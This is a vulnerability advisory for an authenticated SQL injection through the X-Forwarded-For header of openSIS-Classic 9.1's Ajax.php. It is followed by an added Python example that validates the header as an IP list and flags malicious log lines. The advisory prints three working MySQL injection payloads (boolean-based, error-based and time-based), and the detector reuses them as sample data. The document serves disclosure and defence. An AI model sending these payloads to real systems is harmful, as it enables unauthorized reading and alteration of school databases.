CVE-2024-46626: Authenticated SQL Injection Vulnerability in openSIS-Classic Version 9.1 Web Application
Description:
This advisory describes a critical SQL injection vulnerability in the openSIS-Classic Version 9.1 web application. The value of the X-Forwarded-For request header sent to Ajax.php is placed into a SQL query without sanitisation, so any authenticated user can inject SQL code, potentially leading to unauthorized data access or manipulation.
Vulnerability Details:
Type: SQL Injection
Impact: An attacker with any level of system access can execute arbitrary SQL queries. This can lead to data leakage, data corruption, or full database compromise.
Requirements for Exploitation: The attacker must be authenticated to the system but does not need elevated privileges.
Example Payload:
GET /Ajax.php?modname=x HTTP/1.1
Parameter: X-Forwarded-For #1* ((custom) HEADER)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae
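As an added defensive example (not part of the advisory and not openSIS code), the following Python treats X-Forwarded-For as what it should be, a comma-separated list of IP addresses, and flags any request whose header fails that check. The log format and the log lines are constructed for the example; the three flagged header values are the payloads quoted above.

```python
import ipaddress
from typing import List, Optional, Tuple

# Constructed sample of what a reverse proxy or WAF might log for Ajax.php
# requests: the X-Forwarded-For value is everything after " xff=".
# Line 1 is benign; lines 2-4 carry the payloads quoted in the advisory.
SAMPLE_LOG = [
    "GET /Ajax.php?modname=x xff=203.0.113.7, 10.0.0.5",
    "GET /Ajax.php?modname=x xff=127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG",
    "GET /Ajax.php?modname=x xff=127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze",
    "GET /Ajax.php?modname=x xff=127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae",
]


def parse_xff(value: str) -> Optional[List[str]]:
    """Return the header as a list of normalised IP strings, or None.

    Only literal IPv4/IPv6 addresses separated by commas are accepted.
    Quotes, SQL keywords, hostnames or an empty header all yield None,
    so a caller that uses this function never hands an unvalidated
    string to a query. This allow-list check is what the vulnerable
    code path is missing.
    """
    ips: List[str] = []
    for part in value.split(","):
        part = part.strip()
        try:
            ips.append(str(ipaddress.ip_address(part)))
        except ValueError:
            return None
    return ips or None


def suspicious_xff_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, header_value) for each request whose
    X-Forwarded-For is not a clean IP list; these are worth alerting on."""
    hits = []
    for n, line in enumerate(lines, start=1):
        _, sep, xff = line.partition(" xff=")
        if sep and parse_xff(xff) is None:
            hits.append((n, xff))
    return hits


if __name__ == "__main__":
    for n, xff in suspicious_xff_lines(SAMPLE_LOG):
        print(f"line {n}: rejected X-Forwarded-For {xff!r}")
```

The same `parse_xff` check, applied server-side before the header is used in any query, closes this injection vector regardless of which payload is sent; parameterised queries remain the primary fix.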
References: https://github.com/d0ub1edd/CVE-Reference/
Discovered by Devrim Dıragumandan on 09/09/2024